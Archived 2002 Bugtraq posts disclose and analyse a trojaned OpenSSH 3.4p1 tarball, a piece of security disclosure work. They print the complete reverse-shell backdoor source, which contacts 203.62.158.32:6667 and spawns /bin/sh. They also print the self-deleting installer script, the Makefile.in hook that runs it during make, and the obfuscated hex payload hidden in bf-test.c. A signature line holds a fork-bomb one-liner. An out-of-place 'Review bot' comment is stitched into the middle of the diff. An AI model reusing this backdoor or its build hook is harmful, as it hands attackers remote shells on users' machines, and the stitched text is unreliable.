8799802 2002-08-01 13:20 +0200  /53 lines/ Mikael Olsson <mikael.olsson@clavister.com>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 15:40 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23430>
Subject: openssh-3.4p1.tar.gz distribution recently trojaned
------------------------------------------------------------
From: Mikael Olsson <mikael.olsson@clavister.com>
To: bugtraq@securityfocus.com
Message-ID: <3D49198F.8613D352@clavister.com>


From
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@mavetju.org>
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org
(and probably all its mirrors now) is trojaned:

    ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net).
  
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
edwin@mavetju.org    |    Weblog: http://www.mavetju.org/weblog/weblog.php 
bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
(8799802) /Mikael Olsson <mikael.olsson@clavister.com>/(Reflowed)
8799826 2002-08-01 14:17 +0200  /479 lines/ Christian Bahls <christian.bahls@stud.uni-rostock.de>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 15:43 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External Cc recipient: Christian Bahls <christian.bahls@stud.uni-rostock.de>
External replies to: christian.bahls@stud.uni-rostock.de
Recipient: Bugtraq (import) <23431>
Subject: trojan horse in recent openssh (version 3.4 portable 1)
------------------------------------------------------------
From: Christian Bahls <christian.bahls@stud.uni-rostock.de>
To: bugtraq@securityfocus.com
Cc: Christian Bahls <christian.bahls@stud.uni-rostock.de>
Message-ID: <Pine.BSO.4.44.0208011309080.17007-100000@wh5041.stw.uni-rostock.de>

[ i am not subscribed to bugtraq ..
  so if you reply please include me in the cc]

I did an analysis of the trojan horse that was hidden
in the recent portable version of openssh (3.4p1).
It could be found (and still can be) on ftp.openbsd.org
and its mirrors.

in openssh-3.4p1/openbsd-compat a C file "bf-test.c" has been added
   it tells you it has to check for correct handling on HP-UX PL.2
   systems .. which is in fact 100% rubbish
   [PL.1 has been horrible .. so what could PL.2 be? :-]

in openssh-3.4p1/openbsd-compat "Makefile.in" has been edited to
   reflect these changes

when running make, "bf-test.c" compiles to a program which has a
  shell script as output

the shell script outputs a C program and tries really hard to get it
  compiled .. and run

the C program connects to a computer in Australia (203.62.158.32)
and starts a shell locally if asked by the other computer
[ I have not started this program .. but the server seems
  to have closed port 6667 (could be a firewall in between though)
  {this computer probably has been attacked beforehand}]

in my opinion this is a really serious attack
.. as I have to say:
1.) I do not often check signatures on packages I install
1.a) especially I wouldn't have thought about the possibility
     that someone might be able to get access to ftp.openbsd.org
     (ok this is a SunOS machine at the University of Alberta)
2.) I normally run make on a computer reachable by the net
3.) sometimes one is lazy and just runs make && make install as root

you will find all the more interesting stuff
below this signature:

yours
  christian bahls
  math-student
  university of rostock

>> "there she goes .. "

#######
# the C program
# [made readable by my favourite indentation program]
# {all comments are by me}
#######
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int   s;

/*
 * i_val evaluates to /bin/sh
 */
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";

/*
 * this is a signal-handler routine
 * it catches SIGALRM .. closes the socket
 * and waits for 1 hour and then tries again
 */
void  sig(int sig)
{
	close(s);
	sleep(3600);
	longjmp(env, 0);
}
int   main()
{
	int   x;
	char  c, *a[2];
	struct sockaddr_in sa;
	struct sigaction act;

	/*
	 * fork() and continue as background process
	 */
	switch (fork()) {
	    case 0:
		break;
	    default:
		exit(0);
	}
	/*
	 * daemonize a bit (still associated to the same session)
	 */
	close(0);
	close(1);
	close(2);
	/*
	 * setup signal handler routines
	 */
	memset(&act, 0, sizeof(act));
	act.sa_handler = sig;
	sigaction(SIGALRM, &act, NULL);
	do {
		/*
		 * this is where we are going to return after 1h
		 * if we have to retry
		 */
		setjmp(env);
		/*
		 * set up a socket
		 * connect to 203.62.158.32 port 6667
		 * no this program is not going to do irc
		 */
		if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1))
			exit(1);
		memset(&sa, 0, sizeof(sa));
		sa.sin_family = AF_INET;
		sa.sin_port = htons(6667);
		sa.sin_addr.s_addr = inet_addr("203.62.158.32");
		/*
		 * give it 10 seconds to connect
		 * otherwise start over(1h retry time)
		 * if error occurs .. just die
		 */
		alarm(10);
		if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1))
			exit(1);
		/*
		 * read one char from socket
		 * die if something goes wrong
		 */
		if ((x = read(s, &c, 1)) == (-1)) {
			exit(1);
		} else if (x == 1) {
			switch (c) {
			    case 'A':	/* we got an 'A' .. just exit() */
				exit(0);
			    case 'D':	/* we got a 'D' .. turn off the
					 * alarm(), make the socket
					 * stdin/stdout/stderr .. start a
					 * shell .. finish if it
					 * finishes (execve() behaviour) */
				alarm(0);
				dup2(s, 0);
				dup2(s, 1);
				dup2(s, 2);
				a[0] = i_val;
				a[1] = NULL;
				execve(a[0], a, NULL);
				break;
			    case 'M': /* just retry */
				alarm(0);
				sig(0);
				break;
			    default:
			}
		} else {
			exit(0);
		}
	/*
	 * just loop forever
	 */
	} while (1);
}

#####
# Output of bf-test:
#####
>>>SNIPP
#!/bin/sh
cat >conftest.c <<_ACEOF
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig(int sig){close(s);sleep(3600);longjmp(env,0);}int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2);memset(&act,0,sizeof(act));act.sa_handler=sig;sigaction(SIGALRM,&act,NULL);do{setjmp(env);if((s=socket(AF_INET,SOCK_STREAM,0))==(-1))exit(1);memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET;sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr("203.62.158.32");alarm(10);if(connect(s,(struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1);if((x=read(s,&c,1))==(-1)){exit(1);}else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2);a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break;case 'M':alarm(0);sig(0);break;default:}}else{exit(0);}}while(1);}
_ACEOF
(grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out
grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
rm -f bf-test*
TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
if  ! test $TESTPROG ; then TESTPROG=sh; fi
gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1
# testing in raw ecb mode
<<<SNAPP

######
# diff of different versions ..
# one is the trojan ..
######
diff -r -u -N non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in trojan/openssh-3.4p1/openbsd-compat/Makefile.in
--- non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in	Tue Feb 19
21:27:57 2002
+++ trojan/openssh-3.4p1/openbsd-compat/Makefile.in	Wed Jan 31 22:52:03 2001
@@ -26,6 +26,7 @@
 	$(CC) $(CFLAGS) $(CPPFLAGS) -c $<

 all: libopenbsd-compat.a
+	@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

 $(COMPAT): ../config.h
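Review bot: the recipe added under `all:` is an unconditional run-at-build-time step with no failure path, and that alone should fail review. bf-test.c is compiled with a bare `$(CC)` (no `$(CFLAGS)`/`$(CPPFLAGS)`, so nothing from ../config.h or configure's platform checks gates it), its output is handed straight to `sh ./bf-test.out &`, and because the commands are chained with `;` and the last one is backgrounded the recipe always exits 0, so even a compile error in bf-test.c would not break the build. bf-test.c is also in neither of the object lists the surrounding context refers to (`$(COMPAT)`, `$(OPENBSD)`), and a genuine compatibility probe belongs in configure, not in a library target. Suggested action: drop the line and reject any `+` recipe line that executes a freshly compiled program during `make`.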
 $(OPENBSD): ../config.h diff -r -u -N
non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c
trojan/openssh-3.4p1/openbsd-compat/bf-test.c
--- non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c	Thu Jan  1
01:00:00 1970
+++ trojan/openssh-3.4p1/openbsd-compat/bf-test.c	Wed Jan 31 22:52:03 2001
@@ -0,0 +1,251 @@
+/*
+ * Blowfish input vectors are handled incorrectly on HP-UX PL.2
systems.
+ * Perform routine compatability checks.
+ */
+#include <stdio.h>
+
+#define KEY_TEST_NUM    25
+static unsigned char key_test[KEY_TEST_NUM]={
+        0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87,
+        0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f,
+        0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
+        0x88};
+
+/* DES cbc input vectors */
+static unsigned char ecb_data[]={
+
+	0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
+	0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
+	0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
+	0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
+	0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
+	0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c,
+	0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11,
+	0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
+	0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
+	0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
+	0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b,
+	0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,
+	0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c,
+	0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,
+	0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40,
+	0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
+	0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01,
+	0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,
+	0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47,
+	0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f,
+	0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c,
+	0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12,
+	0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57,
+	0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73,
+	0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40,
+	0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f,
+	0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07,
+	0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19,
+	0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f,
+	0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41,
+	0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41,
+	0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03,
+	0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
+	0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70,
+	0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
+	0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
+	0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47,
+	0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e,
+	0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14,
+	0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46,
+	0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a,
+	0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e,
+	0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14,
+	0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b,
+	0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e,
+	0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e,
+	0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46,
+	0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
+	0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e,
+	0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40,
+	0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59,
+	0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c,
+	0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
+	0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e,
+	0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06,
+	0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a,
+	0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03,
+	0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06,
+	0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42,
+	0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
+	0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d,
+	0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19,
+	0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e,
+	0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12,
+	0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d,
+	0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01,
+	0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07,
+	0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41,
+	0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a,
+	0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,
+	0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40,
+	0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,
+	0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46,
+	0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c,
+	0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02,
+	0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,
+	0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57,
+	0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47,
+	0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e,
+	0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c,
+	0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e,
+	0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,
+	0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,
+	0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03,
+	0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59,
+	0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63,
+	0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74,
+	0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,
+	0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f,
+	0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f,
+	0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d,
+	0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,
+	0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46,
+	0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43,
+	0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a,
+	0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,
+	0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,
+	0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,
+	0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,
+	0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,
+	0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f,
+	0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40,
+	0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f,
+	0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f,
+	0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f,
+	0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f,
+	0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49,
+	0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,
+	0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02,
+	0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f,
+	0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d,
+	0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a,
+	0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c,
+	0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46,
+	0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
+	0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,
+	0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25,
+	0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,
+	0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
+	0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,
+	0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,
+	0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,
+	0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,
+	0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,
+	0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,
+	0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c,
+	0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,
+	0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,
+	0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,
+	0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,
+	0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,
+	0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,
+	0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,
+	0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,
+	0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,
+	0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,
+	0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,
+	0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,
+	0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f,
+	0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
+	0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a,
+	0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41,
+	0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,
+	0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,
+	0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f,
+	0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f,
+	0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,
+	0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
+	0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f,
+	0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
+	0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41,
+	0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41,
+	0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a,
+	0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00,
+	0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11,
+	0x09,0x1e,0x25,0x00};
+
+/* big endian */
+static unsigned long bfplain[2][2]={
+        {0x424c4f57L,0x46495348L},
+        {0xfedcba98L,0x76543210L}
+        };
+
+static unsigned long bfcipher[2][2]={
+        {0x324ed0feL,0xf413a203L},
+        {0xcc91732bL,0x8022f684L}
+        };
+
+
+static unsigned char ocb_data[]={
+    0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b,
+    0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20,
+    0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28,
+    0x00};
+
+static unsigned char cbc_key [16]={
+        0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
+        0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87};
+
+static unsigned char cbc_iv
[8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10};
+
+#if defined(WIN16) || defined(__LP32__)
+#elif defined(_CRAY) || defined(__ILP64__)
+/*
+ * _CRAY note. I could declare short, but I have no idea what impact
+ * does it have on performance on none-T3E machines. I could declare
+ * int, but at least on C90 sizeof(int) can be chosen at compile
time.
+ * So I've chosen long...
+ *                                      <appro@fy.chalmers.se>
+ */
+#else
+#endif
+
+main(void)
+{
+    int i, n, err;
+    unsigned char cbc_in[40],cbc_out[40],iv[8];
+
+    dup2(1, 2);
